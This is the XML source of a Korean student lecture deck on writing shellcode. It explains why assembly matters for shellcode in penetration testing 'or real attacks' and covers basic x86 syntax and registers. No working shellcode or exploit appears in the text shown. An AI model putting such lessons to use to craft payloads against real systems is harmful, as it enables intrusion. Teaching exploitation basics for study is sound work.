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72"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="284" r:id="rId3"/>
    <p:sldId id="285" r:id="rId4"/>
    <p:sldId id="286" r:id="rId5"/>
    <p:sldId id="287" r:id="rId6"/>
    <p:sldId id="288" r:id="rId7"/>
    <p:sldId id="290" r:id="rId8"/>
    <p:sldId id="298" r:id="rId9"/>
    <p:sldId id="296" r:id="rId10"/>
    <p:sldId id="297" r:id="rId11"/>
    <p:sldId id="306" r:id="rId12"/>
    <p:sldId id="299" r:id="rId13"/>
    <p:sldId id="300" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="305" r:id="rId16"/>
    <p:sldId id="307" r:id="rId17"/>
    <p:sldId id="309" r:id="rId18"/>
    <p:sldId id="308" r:id="rId19"/>
    <p:sldId id="311" r:id="rId20"/>
    <p:sldId id="312" r:id="rId21"/>
    <p:sldId id="313" r:id="rId22"/>
    <p:sldId id="314" r:id="rId23"/>
    <p:sldId id="316" r:id="rId24"/>
    <p:sldId id="315" r:id="rId25"/>
    <p:sldId id="317" r:id="rId26"/>
    <p:sldId id="303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  <p:sldId id="338" r:id="rId47"/>
    <p:sldId id="337" r:id="rId48"/>
    <p:sldId id="339" r:id="rId49"/>
    <p:sldId id="340" r:id="rId50"/>
    <p:sldId id="341" r:id="rId51"/>
    <p:sldId id="342" r:id="rId52"/>
    <p:sldId id="343" r:id="rId53"/>
    <p:sldId id="344" r:id="rId54"/>
    <p:sldId id="345" r:id="rId55"/>
    <p:sldId id="346" r:id="rId56"/>
    <p:sldId id="347" r:id="rId57"/>
    <p:sldId id="363" r:id="rId58"/>
    <p:sldId id="364" r:id="rId59"/>
    <p:sldId id="349" r:id="rId60"/>
    <p:sldId id="350" r:id="rId61"/>
    <p:sldId id="351" r:id="rId62"/>
    <p:sldId id="352" r:id="rId63"/>
    <p:sldId id="353" r:id="rId64"/>
    <p:sldId id="354" r:id="rId65"/>
    <p:sldId id="356" r:id="rId66"/>
    <p:sldId id="358" r:id="rId67"/>
    <p:sldId id="360" r:id="rId68"/>
    <p:sldId id="362" r:id="rId69"/>
    <p:sldId id="310" r:id="rId70"/>
    <p:sldId id="302" r:id="rId71"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId73"/>
      <p:bold r:id="rId74"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Quicksand" panose="020B0600000101010101" charset="0"/>
      <p:regular r:id="rId75"/>
      <p:bold r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Ubuntu Mono" panose="020B0509030602030204" pitchFamily="49" charset="0"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId78"/>
      <p:italic r:id="rId79"/>
      <p:boldItalic r:id="rId80"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId81"/>
      <p:bold r:id="rId8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037"/>
    <a:srgbClr val="39C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EFE5B754-EBC9-4D97-A545-5280A1FC93EB}">
  <a:tblStyle styleId="{EFE5B754-EBC9-4D97-A545-5280A1FC93EB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font" Target="fonts/font4.fntdata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font" Target="fonts/font2.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7.fntdata"/><Relationship Id="rId87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font" Target="fonts/font10.fntdata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font" Target="fonts/font5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80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font8.fntdata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font" Target="fonts/font3.fntdata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font" Target="fonts/font1.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font6.fntdata"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font9.fntdata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8992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6134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3088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175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422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356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6686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5449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2209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4184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9561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555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60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0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None/>
              <a:defRPr sz="18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나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127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165497" y="1754660"/>
            <a:ext cx="6858000" cy="481324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None/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127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5" name="Shape 4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6" name="Shape 4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key color">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="39C0BA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03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6" r:id="rId5"/>
    <p:sldLayoutId id="214748365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나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
          <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127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나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
          <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127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yscalls.kernelgrok.com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hyperlink" Target="http://dakuo.tistory.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://slidescarnival.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://softwareengineering.stackexchange.com/questions/127668/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://karfn84.tistory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beomnaegol.tistory.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://opentutorials.org/module/1087" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sunghun7511/StudyAssembly" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://luckyyowu.tistory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530350" y="3076575"/>
            <a:ext cx="6767513" cy="70961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/>
              <a:t>  hell   ode</a:t>
            </a:r>
            <a:endParaRPr lang="e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D4522-64C9-4015-847B-70AE7518F01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5723792" y="6304002"/>
            <a:ext cx="3420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500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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Quicksand"/>
              </a:rPr>
              <a:t>Daedeok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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Quicksand"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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Quicksand"/>
              </a:rPr>
              <a:t>SW Meister High School</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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Quicksand"/>
              </a:rPr>
              <a:t> 김성훈</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="15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Shape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC5B8D4-B4F1-4DBD-A7AB-60B6DB837C67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2945425" y="3076575"/>
            <a:ext cx="655025" cy="709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n-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6103B931-46C9-434E-B189-BEAF5E775A7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4818185" y="3076575"/>
            <a:ext cx="677863" cy="709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60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n-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:endParaRPr lang="en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139 L -0.05347 -0.08333 C -0.06476 -0.10162 -0.0816 -0.11204 -0.09913 -0.11204 C -0.1191 -0.11204 -0.13507 -0.10162 -0.14636 -0.08333 L -0.20017 -0.00139 " pathEditMode="relative" rAng="1080000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-55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5313 0.10533 C 0.06441 0.12917 0.0809 0.14213 0.09844 0.14213 C 0.11823 0.14213 0.1342 0.12917 0.14549 0.10533 L 0.19896 -1.48148E-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8569D4-8234-42FE-BD38-9AB1CB01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그래서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>어셈블리를 왜 알아야 하는데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949672-577D-4734-8FC2-FC2BDBDFD1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sz="2000" dirty="0"/>
              <a:t>만약 어떠한 바이너리를 모의 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>또는 실제 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>을 해야 할 상황에 처했다고 가정해보겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>바이너리에 따라 그 크기는 다르겠지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> 실행되길 원하는 코드를 올릴 수 있는 영역은 한정되어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그렇기 때문에 코드는 짧으면 짧을수록 좋습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>이때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>코드를 최대한 짧게 만들기 위해서 기계어를 직접 다룰 수 있으면 좋겠지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>너무나도 많은 노력이 필요하므로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>기계어와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>대</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>대응이 되는 어셈블리를 대부분 사용합니다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550196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8569D4-8234-42FE-BD38-9AB1CB01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그래서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>어셈블리를 왜 알아야 하는데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949672-577D-4734-8FC2-FC2BDBDFD1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sz="2000" dirty="0"/>
              <a:t>그리고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>또 다른 이유가 있는데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>..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ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>바로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기계어는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>아키텍쳐마다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 다릅니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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같은 동작을 하는 코드라도</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>아키텍쳐가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 다르면</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>다른 기계어 바이트들을 가지고있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>그렇기 때문에 상황에 따라서 자신에게 필요한</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>아키텍쳐에서의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>쉘코드를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 만들어야 하기 때문입니다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365737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DB0E35-CBBE-4080-8CB2-CC874952E406}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213338" y="3006969"/>
            <a:ext cx="4994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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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여</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1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 강의에서는 어셈블리를 사용하여 여러가지</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1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8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쉘코드를</a:t>
            </a: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직접 만들어보고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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사용해보겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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68845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How</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Shell Codes?</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"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500" dirty="0"/>
              <a:t>Let’s study assembly!</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84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dirty="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668171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F86C50-978C-4262-A22C-22DE9BC79C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1336432" y="3226777"/>
            <a:ext cx="3596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먼저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어셈블리를 알아봅시다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985129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5EA1AE-5BDB-44C9-9490-AA2BB497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어셈블리 기본 지식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43F112-9C86-4BF8-9B0C-8BE0945E1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97" y="1754660"/>
            <a:ext cx="7723526" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>기본적으로 어셈블리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>옵코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 오퍼랜드로 이루어져 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>옵코드는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 명령어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>오퍼랜드는 매개변수</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>인자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>오퍼랜드는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>at&amp;t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문법과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>문법이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>        - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각각 문법은 오퍼랜드의 순서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>접두사</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>접미사 등이 다릅니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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/>
              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이 발표에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 문법을 사용합니다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550799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7D2545-4B33-445A-83AF-924CF6B493FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310056" y="2224452"/>
            <a:ext cx="7104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오퍼랜드 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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(+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="25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옵코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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4C091-9922-4F11-A427-1B5B358F16E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538655" y="2640627"/>
            <a:ext cx="6878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ex)</a:t>
            </a:r>
          </a:p>
          <a:p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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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call main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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eax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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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064630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7D2545-4B33-445A-83AF-924CF6B493FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310056" y="1995852"/>
            <a:ext cx="7104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at&amp;t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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5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와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="25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intel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="25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문법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="25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4C091-9922-4F11-A427-1B5B358F16E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538655" y="2412027"/>
            <a:ext cx="68785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at&amp;t</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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mov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$1, %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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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mov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4(%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esp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), %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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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20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intel</a:t>
            </a:r>
          </a:p>
          <a:p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mov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eax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1</a:t>
            </a:r>
          </a:p>
          <a:p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mov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eax</a:t>
            </a:r>
            <a:r>
              <a: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esp+4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3586945965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5EA1AE-5BDB-44C9-9490-AA2BB497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어셈블리 기본 지식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43F112-9C86-4BF8-9B0C-8BE0945E1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97" y="1754660"/>
            <a:ext cx="7723526" cy="4813240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>레지스터</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>    - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>레지스터란 간단하게 말하면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, CPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>안에 있는 변수입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
